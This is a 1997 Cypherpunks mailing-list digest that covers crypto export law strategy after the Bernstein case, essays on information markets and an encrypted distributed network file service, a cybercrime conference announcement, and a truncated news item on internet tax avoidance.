:-) -----BEGIN PGP SIGNED MESSAGE----- Bill: I think you missed my point --or I failed to express it coherently. yes, the government does have a strong case with hardware --particulary dedicated hardware, and that was my point! what I think is an effective stratagem is to use a test vehicle which clearly demonstrates the difference --eg the generic black box which can do anything else as well. As soon as you get into focused boxes --eg the ASIC you mention, then the government has an argument. I'm looking at a routine "boot sector virus" (DOS) -not even the "pretty program loader" (Windows) box. the object is to proof the absurdity of the whole issue --the computer just reads the natural language, freedom of speech, program. likewise, you can not have any of the functions in firmware for the test case, despite the fact the process would be faster --that would be another test case to extend the principal. I did suggest the source code must absolutely be written in a language which is understandable --good clean ANSI C, for instance. your suggestion of an interpretive language is a good idea if it creates an easily understood body of code. perl? powerful, but even more cryptic than C --sometimes I think perl is too powerful . I will not fault your suggestion for more code test cases --however, the real trick is to get Bernstein moving through the ninth circuit and onto the Supreme Court --it only takes one and if the SC reaffirms Judge Patel's statement on source code freedom of speech and prior restraint, we're home free on that issue. What I am concerned will happen is that the feds may be forced to give up prosecuting professors who teach encryption (free speech and prior restraint), and may be unable to prevent Phil Z from publishing the code in book form, etc. but will then try to claim that all encryption needs to be attached to hardware --this is where the generic argument comes in --they would in effect be required to ban computers --all computers. actually, with the push for universal JAVA, write the algorithm in JAVA... the only other alternative is massive civil disobedience, something I suspect many of us are quite familiar with; approaching 60, I think I'll pass on any repeats of dogs and water cannons. attila "Experience keeps a dear school, but fools will learn in no other." --Benjamin Franklin ______________________________________________________________________ "attila" 1024/C20B6905/23 D0 FA 7F 6A 8F 60 66 BC AF AE 56 98 C0 D7 B0 -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: latin1 Comment: No safety this side of the grave. Never was; never will be iQCVAwUBNAcUvL04kQrCC2kFAQFCnQP/Vwna9eRJjSAlBCBPlF9MUrLsFNu4owqy ruVwPk9qLczUF/qK+KV51I3qfSkz6OyKdrHSeF14wKT/2oclEmuZX85w8IG5oxEB 9L7gTZR1396KhFe3T3xS22c7ZNrnHMNEMcMtLVnFjEu2yBJQIegaEchks6p12X3m q9m3YcCYX6I= =w6Js -----END PGP SIGNATURE----- +The next obvious directions to go, after we win the appeal, are to +solidify the judgement with more source code +(and deal with the fact that they'll keep changing the regulations), +especially if we can do a source code in an interpreted language like +perl, and then maybe go after binary code as speech. +We'll also need to do something about the Karn case, +since the difference between source code on paper and +source code on a floppy is obviously not a legitimate one. +If you do hardware, they'll say "Hardware isn't speech, it's stuff, and +exporting stuff is commerce, and we can regulate commerce and exports", +and they'll be right constitutionally if not morally. +Exporting the detailed plans for encryption hardware might be fun, +especially if the hardware is very generic (say, a speech card for a +Nintendoid with some crypto firmware for the Nintendoid's CPU, or a +cellphone-modem with crypto pumpware.) +About the only Real Hardware I can see having a chance is +some sort of ASIC-based device like a pocket organizer or cashcard that +does encryption as an incidental part of some other function, such as +an authentication protocol. But if it's a cash card, the rules have +been flexible enough to handle permits for banking-only devices, and +you don't get an interesting Constitutional case about being wrongly +denied an export permit when they give you a permit, or at least give +out permits for functionally similar products. +I suppose there'd be some hack value in exporting a smart-cellphone +with downloadable firmware/javaware (e.g. for multiple language +support) with all the right export permits, and then releasing the +crypto code from replay or kremvax or www.hongkong.cn , and using it +as precedent for your application for exporting the crypto-equipped +version. +# Thanks; Bill +# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com +# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If +this is a mailing list or news, please Cc: me on replies. Thanks.) From trei at process.com Fri Aug 29 12:26:28 1997 From: trei at process.com (Peter Trei) Date: Sat, 30 Aug 1997 03:26:28 +0800 Subject: Greetings, Message-ID: <199708291915.MAA18367@toad.com> > From: Jack Holt > To: > Subject: Greetings, > Date: Fri, 29 Aug 1997 12:03:39 -0500 > Reply-to: Jack Holt > Hello, I would like some information about offshore banking and opening a > checking account. Thank you. Jack Holt 1004 Lakewood St. Ozark,Mo. 65721 > U.S.A. > Phone no. 417-485-7038 email jholt at intrcom.com I am interested in a > checking > account. We seem to be getting a rash of clue-free queries today. Was the cypherpunks address mentioned on some general media article? Peter Trei trei at process.com From rah at shipwright.com Fri Aug 29 12:37:15 1997 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 30 Aug 1997 03:37:15 +0800 Subject: The Information Silk Road Message-ID: --- begin forwarded text Date: Fri, 29 Aug 1997 13:18:43 -0400 (EDT) To: e$@thumper.vmeng.com Subject: The Information Silk Road Cc: rah at shipwright.com, "R. Jason Cronk" From: Ted Anderson Sender: Precedence: Bulk List-Software: LetterRip 2.0 by Fog City Software, Inc. List-Unsubscribe: List-Subscribe: -----BEGIN PGP SIGNED MESSAGE----- Subject: The Information Silk Road In this note I criticize recursive auction markets as a good model for the global market in public information. Instead I suggest an agent based model where data merchants compete to be suppliers of information to clients based almost entirely on value they above and beyond the value of the information itself. I ignore issues of data ownership and data privacy. I realized that e$ is perhaps not the best forum for this message and welcome redirection to a more appropriate venue. The Information Silk Road I would like to draw a distinction between trading in digital services and trading information. There are interesting proposals to use market-based mechanisms to manage computer resources such as memory and CPU cycles[1] or network bandwidth[2]. Attempts have been made to extend this idea to trading information, such as the recursive auction market[3]. While the similarities between computer resources and the material world are close enough to make market-based ideas quite successful, I don't think the same is true for markets in information. Differences stem from the fact that information can be copied with perfect fidelity and essentially zero cost while both physical commodities and computing resources are strictly limited in quantity. - From another point of view, the problem is that the responsibilities of ownership are different. Market-based mechanisms work by clearly identifying an owner for each resource. The owner (in computational contexts this is usually a software agent) then tries earn enough income from its asset to pay expenses. The job of the owner is then to avoid overuse (the tragedy of the commons problem) and underuse. However, with information, overuse is impossible (maximizing the use of information is actually beneficial to general good) and only underuse is a risk. Underuse of information can even lead to a problem not shared with other limited commodities, it may be lost altogether. Practically speaking there is another difference between computer resource commodities and information products. For example, any memory page can be sold to a software agent and numerous agents will compete for a fixed pool of identical pages. However, while I can endlessly replicate a piece of information, each customer won't need more than one of each datum. While different agents may occasionally request the same piece of information, this is often rare. Partly this is because a even small cache near the customer will mean that the server only gets a single request from each cache miss, not from each customer request. Therefore, an information seller must stock a huge selection of data and only expect a very tiny fraction of them to be to be in high demand. Still, I would like to see both the digital silk road (markets for computer services) and the information silk road (markets for data) built. I am particularly interested in the design of the data merchants that will be the traders on the information silk road. Recursive Auction Market A useful contribution of the recursive auction market idea is that it denigrates to concept of information ownership. While ownership of information may still be useful to prevent valuable information from disappearing altogether (by being replaced in every supplier's inventory by more profitable data) it has nowhere near the standing of ownership of finite commodities. The recursive auction market idea assumes that data in high demand would propagate from suppliers or intellectual property producers, through intermediate distributors, to consumers as fast as the network could carry it. At each stage the data is auctioned to the highest bidder who must factor into his bid price the network transfer charges[2] and his ability to further resell it. As the data is distributed, the rarity premium available to early sellers disappears, leaving only the basic network delivery costs. These auctions require multiple simultaneous buyers. However it would seem that this would be a very unusual case. Except for a few extreme cases, the market for data will consist of multiple buyers spread out in time. This means that a significant expense of the seller is for the storage of the data between buyers. This storage rental must be factored into the data's price. This is a hard cost that depends on the interval between requests of each piece of data. Rarity, and the premium it adds to the price, is usually an ephemeral, even self-defeating, property of data. This suggests that an auction is not a good general paradigm to use for trading information. Data Merchants A better model of the information silk road has a large population of data merchants spread throughout the network. Their mission is to maintain an inventory of data in anticipation of being able to resell it profitably at a later time. Viewed individually these data merchants provide a data caching service. While viewed collectively, the information silk road is a replicated data storage facility[4]. So what services can a data merchant offer which customers might be willing to pay for. In other words, how can they add value. Locality. Assuming some distance (as the packets fly) sensitivity to network transport charges, data will be cheaper from a local supplier than from a distant one. This means that a merchant can pay the transport charges to obtain the distant data once and attract local buyers by charging less than it would cost them to fetch it from a remote source. As long as there are multiple local buyers and the data storage costs incurred between requests is small compared to the differential between remote and local network transport charges then the local vendor can turn a profit. Authoritativity. For small data, where the cost of transferring the data is comparable to the cost of requesting it, it will be useful for a client to pass its requests to a single merchant and expect a high probability of obtaining the data. Without consulting an authoritative source the client will potentially have to contact many merchants before finding the data it seeks. Unless the data is large this cost may dwarf the actual transfer cost. Being an authoritative source does not have to be a global property, but might apply to narrowly defined types of data: hostname to IP address mappings, perl scripts, or Cypherpunks messages. Being authoritative depends upon the data merchant maintaining a persistent reputation. Interestingly an authoritative source doesn't actually have to store any data, it may operate purely as a locator service. Speed. Some data merchants may strive to provide data rapidly but spending more on rotating media, doing more aggressive prefetch and caching, and having bigger servers and network connections. For some customers and some data, paying a premium for speed could be quite desirable. Anonymity. Guaranteeing privacy for a client's requests could be an attractive option. This is an other feature that would depend upon the merchant maintaining a good reputation. [1] Mark S. Miller and K. Eric Drexler, "The Agorics Papers", http://www.webcom.com/~agorics/agorpapers.html. [2] Norman Hardy and Eric Dean Tribble, "The Digital Silk Road", http://www.webcom.com/~agorics/dsr.html. [3] http://www.transarc.com/~ota/RecursiveAuctionMarket.txt [4] eternity data storage service -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBNAcEPgGojC9e/wyBAQE0QAP+IGeBTV4WAOG2IlP+ACh8PXShQdAe4bph 4HNPZt6HD8shdHrqgbtl4j1GXOa9VLrYtuhgoPdLAFQHTz/W3jQ+eVVJoCwUsQ0a oMYJB2gwSbRB7jFzTaWNE8n3DO42m49SPiys3jCuAg2GSteA+ar9cLWNIPClqLWw 8jkrjKjP7MI= =PltB -----END PGP SIGNATURE----- --------------------------------------------------------------------- Where people, networks and money come together: Consult Hyperion http://www.hyperion.co.uk info at hyperion.co.uk --------------------------------------------------------------------- Like e$? Help pay for it! See Or, for e$/e$pam sponsorship, --------------------------------------------------------------------- --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From lharrison at mhv.net Fri Aug 29 14:25:06 1997 From: lharrison at mhv.net (Lynne L. Harrison) Date: Sat, 30 Aug 1997 05:25:06 +0800 Subject: Website highjacking -- Cybercrime Conf Announcement Message-ID: <3.0.3.32.19970829171755.00727e70@pop.mhv.net> [Apologies for the duplication if the following has already been posted here.] --------------------------- >Approved-By: lewrose at ARENTFOX.COM >X-Sender: oceana at popserver.panix.com >X-Mailer: Windows Eudora Pro Version 3.0 (32) >Date: Thu, 28 Aug 1997 14:14:25 -0400 >Reply-To: Lawyers and the Internet >Sender: Lawyers and the Internet >From: "Oceana Publications, Inc." >Subject: [NET-LAWYERS] Website highjacking -- Cybercrime Conf Announcement >To: NET-LAWYERS at PEACH.EASE.LSOFT.COM > >PRESS RELEASE > >AUGUST 18, 1997 > >(Dobbs Ferry, NY) Oceana Publications, Inc. in cooperation with the >University of Florida Centre for International Financial Crimes Studies; >Kroll Associates, Warroom Research LLC; and the National Computer Security >Association announce two international conferences on CYBERCRIME, >ELECTRONIC COMMERCE, CORPORATE, BANK & COMPUTER SECURITY, FINANCIAL CRIMES >AND INFORMATION WARFARE to be held at the Washington, D.C. Omni Shoreham >Hotel on October 29, 30, 31, 1997 and the New York City Hilton on November >17, 18, 1997. > >Discussions by Commissioners from The President's Commission on Critical >Infrastructure Protection (PCCIP) and Leaders of the Manhattan Cyber >Project and WarRoom Research will high-light the upcoming Conferences, >CYBERCRIME, ELECTRONIC COMMERCE, CORPORATE, BANK & COMPUTER SECURITY, >FINANCIAL CRIMES AND INFORMATION WARFARE, to be held at the Washington, >D.C. Omni Shoreham Hotel on October 29, 30, 31, 1997 and the New York City >Hilton on November 17, 18, 1997. > >General Robert T. Marsh, U.S. Air Force (Ret.), Chairman of The President's >Commission on Critical Infrastructure Protection will lead the discussion >of the Commission's work and recommendations. Commissioners Brent Greene >(the DOD Representative), Steve Mitchell (the DOJ Representative) and Dr. >Mary Culnan, Professor of Business Administration of Georgetown University >will be panelists with Gen. Marsh. > >Over fifty faculty members, including Mr. Alan E. Brill, Managing Partner >of Kroll Associates, the world's foremost computer crime investigator, Mr. >Donn Parker, Senior Management Systems Consultant, SRI Consulting, Dr. >Eugene Spafford, Professor of the Computer Science, Purdue University, Dr. >Dorothy Denning, Professor of Computer Science, Georgetown University, Mr. >Winn Schwartau of Security Experts, Inc. And Peter S. Tippett, President of >the National Computer Security Association will speak and lead panel >discussions. Dr. Barry Rider, Director of the Institute of Advanced Legal >Studies, University of London and a Fellow in Law at Jesus College, >Cambridge University will address the connections between the Global Mafias >and Cybercrime. Dr. Rider is recognized as the world's authority on money >laundering, organized crime, banking law and economic crime. Professor >Fletcher N. Baldwin, Jr. of the UF College of Law will address electronic >privacy. > >The Conferences are sponsored by Oceana Publications, Inc. of Dobbs Ferry, >NY, The Centre for International Financial Crimes Studies of the College of >Law of the University of Florida, Kroll Associates, Inc., WarRoom Research >LLC and the National Computer Security Association (NCSA). > >For further information concerning program content, contact Dr. Robert J. >Munro, Conference Program Coordinator and Co-Director of the Centre for >International Financial Crimes Studies, College of Law, University of >Florida, Gainesville, FL 32611, tel: 352-392-0417, fax: 352-392- 8727, >e-mail: munro at law.ufl.edu. > >For information on registration, group discounts, exhibitors and vendors >and media, contact Mr. John Downey, Vice President and Director, >International Seminars Division, Oceana Publications, Inc., 75 Main Street, >Dobbs Ferry, NY 10522 USA, tel: 914-693-8100 or 1-800-831-0758, fax: >914-693-0402, e-mail: oceana at panix.com. > > > > > > > > >Annual International Conference on >CYBERCRIME, ELECTRONIC COMMERCE, CORPORATE, BANK & COMPUTER SECURITY, >FINANCIAL CRIMES and INFORMATION WARFARE > > Sponsored by Oceana Publications, Inc. > in cooperation with > The Centre for International Financial Crimes Studies, College of Law, >University of Florida; > Kroll Associates, Inc.; > WarRoom Research LLC; > and the National Computer Security Association (NCSA) > >To be held in two locations: > > October 30-31, 1997 > Omni-Shoreham Hotel > Washington, DC > > November 17-18, 1997 > New York Hilton and Towers > New York, NY > >For more information contact Oceana's International Seminars Division >Telephone: 800/831-0758 or 914/693-8100 >Fax: 914/693-0402 >E-mail: oceana at panix.com >WEB: http://www.oceanalaw.com (go to seminars subpage) > >DAY 1 (Washington. DC & New York, NY): > >Potholes on the Information Superhighway and Prospects for Crime on the >World Wide Web > >Security in Cyberspace >- Includes: Manhattan Cyber Project Update > >U.S. Government and Legal Perspectives on Cybercurrency & Cybercrime > >Luncheon Address > - Mr. Mark Gembicki & Mr. Steven Shaker > WarRoom Research LLC > >The President's Commission on Critical Infrastructure Protection (PCCIP) > - Threats and Vulnerabilities of Infrastructure > - Global Infrastructure Implications > - Commission Recommendations > - Information Warfare & Assurance > >Banking and Information Security > >DC ONLY: >Keynote Addresses >- Dr. Eugene Spafford, Professor of Computer Science, > Purdue University >- Mr. Donn Parker of SRI Consulting > >Information Warfare & National Security: An Introduction > >NY ONLY: >Plastic Card Fraud, Internet Banking, The Electronic Purse & Smart Cards > >Denial of Service Scenarios: From Meltdown to Survival > >DAY 2 (Washington, DC & New York, NY): > >Corporate Managers: Their Vision of Managing Risk Through the 2000s > >Solutions to International Corporate Espionage and Intellectual Property >Crimes > >Global Electronic Money > >Luncheon Addresses >- (DC & NY) Mr. Michael Zboray, Gartner Group >- (DC only) Mr. Winn Schwartau, Security Experts, Inc. > - (NY only) Mr. William Boni, Intelligence & Information Protection >Services > >The Impact of Technology and Encryption on Domestic & International >Organized Crime > >The Future of Encryption > >None of Your Cyber-Business! Privacy in the Age of the Internet > >Information Warfare, the Threat of an Electronic "Pearl Harbor" and Hackers >as a "National Resource" > >DC ONLY: >Military Intelligence Applications > >NY ONLY: >Security Lessons from the Financial Services Industry >- Effective Management of Security: >- Top-Down/Bottom-Up Accountability and Vision >- The Importance of Having Internal Controls Outside of the Information System >- The Value of Having Multiple Overlapping and Mutually Reinforcing >Security Measures > >Ask about: >*Optional Pre-Conference Institute: Cybercrime and/or Money Laundering >Workshops, Oct. 29th, Washington, DC only. > >Distinguished Faculty include: > >Mr. Robert Ayers, Former Chief of the DOD Intelligence Information System >Computer Security Program; Former Director of the Department of Defense >Defense-Wide Information Systems Security Program > >Professor Fletcher N. Baldwin, Jr., Conference Chairman, S.T. Dell Research >Scholar, Professor of Law & Director of the Centre for International >Financial Crimes Studies, College of Law, University of Florida, >Gainesville, FL > >Mr. William E. Baugh, Currently, Vice President, Information Technology and >Systems Section, SAIC; Former Assistant Director, FBI > >Major Brad Bigelow, U.S. Air Force, Washington, DC > >Mr. William Boni, Manager, Intelligence & Information Protection Services, >Amgen, Thousand Oaks, CA > >Mr. Arnaud de Borchgrave, Director, Center for Strategic and International >Studies, Washington, DC > >Mr. Alan E. Brill, Managing Director, Kroll Associates, New York, NY; Mr. >Brill is an International Authority on the Information Superhighway and >Computer Crimes; Manager of Kroll's Global Information Security and >High-Technology Investigations Group > >Mr. Francis Bunting, Chief, Money Laundering Investigative Unit, Citicorp, >Tampa, FL > >Col. Alan D. Campen, U.S. Air Force (Ret.), Midlothian, VA; Adjunct >Professor, School of Information Warfare and Strategy, National Defense >University, Ft. McNair, Washington, DC > >Mr. Scott Charney, Chief, Computer Crime Division, Department of Justice, >Washington, DC* > >Mr. Jim Christy, USAF, On detail to the Information Protection Task Force, >Federal Bureau of Investigation, Washington, DC > >Mr. Guy L. Copeland, Director, Technology, Computer Sciences Corporation, >Herndon, VA > >Ms. Mary Culnan, Commissioner & Associate Professor, School of Business, >Georgetown University, Washington, DC > >Mr. Kawika Daguio, Electronic Money Specialist, American Bankers >Association, Washington, DC* > >Dr. Dorothy E. Denning, Professor, Computer Science Department, Georgetown >University, Washington, DC > >Mr. Alan Fedeli, Manager, IBM Internet Security Services, Suffern, NY > >Mr. Thomas Firnhaber, FinCEN, U.S. Treasury > >Ms. Susan J. Galli, Vice-President, Office of Legal Affairs, Citibank, >N.A., New York, NY > >Ms. Tatiana Gau, Vice President for Integrity Assurance, America Online, >Dulles, VA; Former Executive Vice President, Parvus International > >Mr. Kenneth M. Geide, Chief, Economic Espionage Unit, Federal Bureau of >Investigation, Washington, DC > >Mr. Mark Gembicki, Executive Vice President, WarRoom Research, LLC, >Baltimore, MD; led collaborative Information Systems Security Survey with >the U.S. Senate's Permanent Subcommittee on Investigations and Present >Project Coordinator of the Manhattan Cyber Project. > >Mr. Brent Greene, Commissioner, Department of Defense Representative, >President's Commission on Critical Information Infrastructure (PCCIP), >Washington, DC > >Mr. Mike Higgins, Assistant Vice President, Science Applications >International Corporation, Center for Information Protection, McLean, VA; >Former Chief, Countermeasures, DISA > >Mr. Steve Katz, Vice President & Chief Information Security Officer, >Citibank, New York, NY > >Ms. Kathleen Kincaid, Director of I/T Security Programs, IBM, Somers, NY > >Mr. Herb Lin, Senior Staff Officer, National Research Council, Washington, >DC > >Mr. Shaun Lonergan, FinCEN, U.S. Treasury, Washington, DC > >General Robert T. Marsh, U.S. Air Force (Ret.), Chairman, President's >Commission on Critical Information Infrastructure (PCCIP), Washington, DC > >Mr. John McClurg, FBI Computer Investigations and Critical Infrastructure >Threat Assessment Center, Washington, DC; Economic Espionage Unit, Federal >Bureau of Investigation, Washington, DC * > >Admiral Michael McConnell, Vice-President, Booze-Allen & Hamilton, McLean, >VA; Adm., U.S. Navy (Retired); Former Director, National Security Agency > >Mr. Bruce McConnell, Co-Chair, Inter-Agency Working Group on Crypto Policy, >OMB, Washington, DC > >Mr. David McMunn, President, McMunn Associates Inc./Borders Unlimited >Corporation, Vienna,VA > >Dr. Robert J. Munro, Conference Co-Chairman and Co-Director of the Centre >for International Financial Crimes Studies, College of Law, University of >Florida, Gainesville, FL > >Mr. Donn Parker, Senior Management Systems Consultant, Information Security >Program, SRI Consulting, Menlo Park, CA > >Mr. Mark Pollitt, Supervisory Special Agent and Program Manager, Computer >Analysis Response Team, FBI Laboratory, Washington, DC > >Mr. Marcus J. Ranum, CEO, Network Flight Recorder, Inc., Baltimore, MD > >Mr. Mark D. Rasch, Director of Information Security Law, Science >Applications International Corporation, McLean, VA > >Mr. Richard Rees, Supervisory Special Agent, Washington Field Office, >Computer Crime Squad, Federal Bureau of Investigation, Washington, DC > >Dr. Barry A.K. Rider, Director of the Institute of Advanced Legal Studies, >University of London; Fellow in Law of Jesus College, University of >Cambridge; Executive Director of CIDOEC and Barrister at Law > >Mr. Thomas H. Roche, Deputy General Counsel and Vice President, Federal >Reserve Bank of New York, NY, NY > >Mr. Shalom Rosen, Vice President, Emerging Technologies, Citibank, NY, NY > >Mr. Daniel J. Ryan, Corporate Vice President & Division General Manager, >Science Applications International Corporation, Falls Church, VA > >Mr. Charles S. Saphos, Currently Attorney at Law, Fila & Saphos, Columbia, >MD; formerly General Counsel, National Central Bureau - INTERPOL, U.S. >Justice Department, Washington, DC > >Mr. E. Eugene Schultz, SRI Consulting, Menlo Park, CA > >Mr. Dan Schutzer, Vice President and Director of Advanced Technology, >Citibank, New York, NY > >Mr. Winn Schwartau, COO, Security Experts, Inc., Seminole, FL. Mr. >Schwartau, a leading expert on information security and electronic privacy, >is an author of several books including, " Information Warfare: Chaos on >the Electronic Superhighway." > >Mr. James C. Settle, Currently, Settle Services in Technology, LLC, >Springfield, VA; Former Head, National Computer Crime Squad, Federal Bureau >of Investigation, Washington, DC > >Mr. Steven Shaker, President, WarRoom Research, LLC, Baltimore, MD; noted >futurist and authority on competitive intelligence and "war room" >applications > >Mr. Jeffrey H. Smith, Attorney at Law, Arnold & Porter, Washington, DC; >Former General Counsel of the Central Intelligence Agency > >Dr. Eugene Spafford, Professor of Computer Science, Purdue University, West >Lafayette, IN > >Mr. Daniel Stipano, Director of Enforcement and Compliance, Comptroller of >the Currency, U.S. Treasury, Washington, DC > >Mr. Edward M. Stroz, Supervisory Special Agent, Computer Crimes Squad, >Federal Bureau of Investigation, NY, NY > >Professor Betty Taylor, Professor of Law, College of Law, University of >Florida, Gainesville, FL > >Dr. Peter S. Tippett, President, National Computer Security Association, >Carlisle, PA; Director, Computer Ethics Institute and is a trained >scientist with both a Ph.D. and M.D. > >Mr. Steve Walker, President, Trusted Information Systems, Glenwood, MD > >Mr. Ira Winkler, CISSP, Severna Park, MD; Mr. Winkler is the author of >"Corporate Espionage." > >Lt. Gen. C. Norman Wood, U.S. Air Force (Ret.); Former Director of the >Intelligence Community Staff and now Vice President/General Manager of BDM >Federal, McLean, VA* > >Mr. Michael Zboray, Vice President and Program Director, Gartner Group, >Stamford, CT* > >* Invited > >For more information contact Oceana's International Seminars Division >Telephone: 800/831-0758 or 914/693-8100 >Fax: 914/693-0402 >E-mail: oceana at panix.com ************************************************************************ Lynne L. Harrison, Esq. | Destiny: Poughkeepsie, New York | "A tyrant's authority for crime lharrison at mhv.net | and a fool's excuse for failure." http://www.dueprocess.com | - Ambrose Bierce ************************************************************************ DISCLAIMER: I am not your attorney; you are not my client. Accordingly, the above is *NOT* legal advice. From enoch at zipcon.net Fri Aug 29 14:26:37 1997 From: enoch at zipcon.net (Mike Duvos) Date: Sat, 30 Aug 1997 05:26:37 +0800 Subject: A Distributed Network Cache Service Message-ID: <19970829211621.6411.qmail@zipcon.net> I've been thinking a bit about the micropayment-based distributed network file system of the future. It should be scalable, with the addition of servers being a simple process. Anyone should be able to run a server. Kidnapping a server should disclose nothing about the contents of files stored there. Which files are stored on which servers should be concealed from mere users of the network. Anyone should be able to use the system by connecting to the server nearest them. Deterministic routing between servers should be used by servers to provide files to other servers. The system should provide for replication of files on a fixed number of servers, with "k of n" parts being sufficient for reconstruction. Aside from replication done for reliability, there should be only one copy of a file in the system at any time. If multiple users submit the same file, there should be no more copies than if one user submitted it. The architecture of the system should be completely independent of any specific file system organization, and any user should be able to sync all or any part of his file system with the network file system, or cache against the network file system on his local machine. The system should be completely secure, even from operators of servers. The person submitting a file receives a secret necessary for its reconstruction, and the file may only be accessed by the owner and those to whom the secret is communicated. The war room at the Pentagon and TCMay should be able to use the same server as an extension of their local file systems without any security worries. Let's consider the following service... Bob has an string of 100,000 octets he wants to make available to Alice and a few of their closest friends. Bob makes a secure connection to a Trusted Agent doing business with the network file system, and gives the Trusted Agent the string, and a micropayment of $1/MB or 10 cents. Working in a secure box, the Trusted Agent batch compresses and scrambles Bob's string into a much smaller string of seemingly random bits, and gives Bob two 128 bit values, a TAG, which will identify Bob's data to Bob, and to anyone else Bob may wish to share his data with, and a CONTEXT, which will unravel Bob's data back into its original form. The Trusted Agent then signs Bob's data, declaring that the resulting digital coccoon produced from Bob's data is associated with the TAG, and that the CONTEXT necessary to recover the data has been communicated to Bob and all copies destroyed. The agent gives Bob the TAG and CONTEXT, and sends the processed data and the TAG to the distributed file system, and it is stored on one or more of its servers for the next 100 days, after which it expires. For the next 100 days, Bob and all of his friends may use the 256 bit TAG/CONTEXT pair in place of Bob's data and may serve that data for free any number of times off any network file system server. They simply make a secure connection to any server, and send the TAG. The server returns to them the seemingly random stream of bits, after which a freeware program takes that data and the CONTEXT, and regenerates the original data. After 100 days, bob may fork over another 10 cents for another 100 days, or his data will disappear. The TAG assigned to an Octet String is unique, and no two strings have the same TAG, and no string is ever assigned multiple tags, no matter how often it may be entered and purged from the system. Now, almost everything you could want from a network wide distributed file system can be carried on top of this simple service, which might be considered a system of temporary lodging for popular Octet Strings. You rent your Octet String a room, where you and people you authorize may have unlimited visits for 100 days, and at the end, your Octet String checks out for parts unknown. One can do an almost unlimited number of useful things with such a service which, given a fast network connection, allows you to store any file in 256 bits for a period of time ranging from 100 days to forever, for a small fee. Bob could back up his entire file system to the network, sending each individual file or directory as an Octet String, with hard links to files replaced with TAG/CONTEXT pairs. The TAG/CONTEXT pair for Bob's root directory would then be used to access Bob's file system off any network server. If Bob changed some files, he could resync his FS with the server by only updating a few Octet Strings. If Bob synced his FS with the network daily, and jotted down the TAG/CONTEXT pair for his root directory, Bob could mount his file system as it appeared at backup time for any of the last 100 days, with no replication of material on the servers that contained it. Bob could write a "compression" program, Bobzip, which would produce an "archive" where each file only took 256 bits of space, and which could be "unBobzipped" on any machine connected to the Network for the next 100 days. Bob could mail this small "archive" to his friends. If browsers understood URLs referencing the distributed file system, Usenet binaries could be replaced with appropriate pointers in Usenet articles, ending the endless replication of binaries on thousands of machines, and reducing Usenet back to a managable volume of data. Users could boot their machines off the Network, and instantly see gigabytes of software available to them. After syncing their cache file system with the network, they could drop their PC off the roof, buy another one, and by typing in just one TAG/CONTEXT pair, see all their files again. Cache proxys could be set up which would grab files from the servers and provide NFS access to them, permitting other hosts to export NNTP, HTTP, and FTP access to the distributed network data. I would imagine a typical useful node in such a distributed system would need about 10 gig of disk, a fast network connection, and a reasonably fast processor. Such a node could hold 100 meg of compressed data for each of the 100 days until the space was reused. At full utilization, each node would generate in excess of $100 a day of revenue at $1/MB. -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From rah at shipwright.com Fri Aug 29 14:27:40 1997 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 30 Aug 1997 05:27:40 +0800 Subject: Greetings, In-Reply-To: <199708291915.MAA18367@toad.com> Message-ID: At 11:25 am -0400 on 8/29/97, Peter Trei wrote: > We seem to be getting a rash of clue-free queries today. Was the > cypherpunks address mentioned on some general media article? Yup. Forbes, for one. :-). Well, not the address, but certainly the name 'cypherpunks' which generates great gory hit piles to this list when entered into any search engine... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From shamrock at netcom.com Fri Aug 29 15:39:30 1997 From: shamrock at netcom.com (Lucky Green) Date: Sat, 30 Aug 1997 06:39:30 +0800 Subject: A Distributed Network Cache Service In-Reply-To: <19970829211621.6411.qmail@zipcon.net> Message-ID: On Fri, 29 Aug 1997, Mike Duvos wrote: > The Trusted Agent then signs Bob's data, declaring that > the resulting digital coccoon produced from Bob's data is > associated with the TAG, and that the CONTEXT necessary to > recover the data has been communicated to Bob and all copies > destroyed. Which is of course where the protocol will fail. Any such system must be resistant to operator compromise. A clean solution for a distributed data haven resistant to machine/operators compromise would be to use a design similar to the Anonymous Mailbox Servers I gave a talk on at HIP'97. Unfortunately, our project leader is very busy with his daytime job and it probably will be a while before we will see some demo sites up and running. But it will happen :-) --Lucky From frogfarm at yakko.cs.wmich.edu Fri Aug 29 15:49:55 1997 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Sat, 30 Aug 1997 06:49:55 +0800 Subject: tax_1.html Message-ID: <199708292258.SAA30121@yakko.cs.wmich.edu> [1]Reuters New Media [ [2]Yahoo | [3]Write Us | [4]Search | [5]Info ] [ [6]Index | [7]News | [8]World | [9]Biz | [10]Tech | [11]Politic | [12]Sport | [13]Scoreboard | [14]Entertain | [15]Health ] [ Reuters | [16]Wired | [17]ZDNet ] _________________________________________________________________ Previous Story: [18]SkyBridge Applies With U.S. For Satellite Network Next Story: [19]Altera Tumbles After Sales Warning, Others Follow _________________________________________________________________ Friday August 29 9:52 AM EDT Report Says Net May Help Tax Dodgers CANBERRA - Increasing use of the Internet for electronic commerce may lead to a rise in tax avoidance and accidental non-compliance, according to an Australian Taxation Office report. However, the report found Internet use would have no immediate impact on Australian tax collections because issues such as bandwidth limits and electronic payment system immaturity were restricting the amount of electronic commerce. While the report finds that the impact on the tax base will vary according to industry, tax and income type, there is no immediate appreciable impact on tax collections," it said. (But) there are also concerns about the increased scope for tax planning, especially using tax havens, and for increased accidental non-compliance, as ... businesses engage in international trade and become subject to international taxation obligations with which they may not be familiar." The ATO said international co-operation would be needed to fully respond to these issues. In addition, the ATO was seeking to: -- have Australian Company Numbers (ACNs) displayed on commercial Internet sites; -- have proper registration procedures for Internet businesses; -- apply comparable 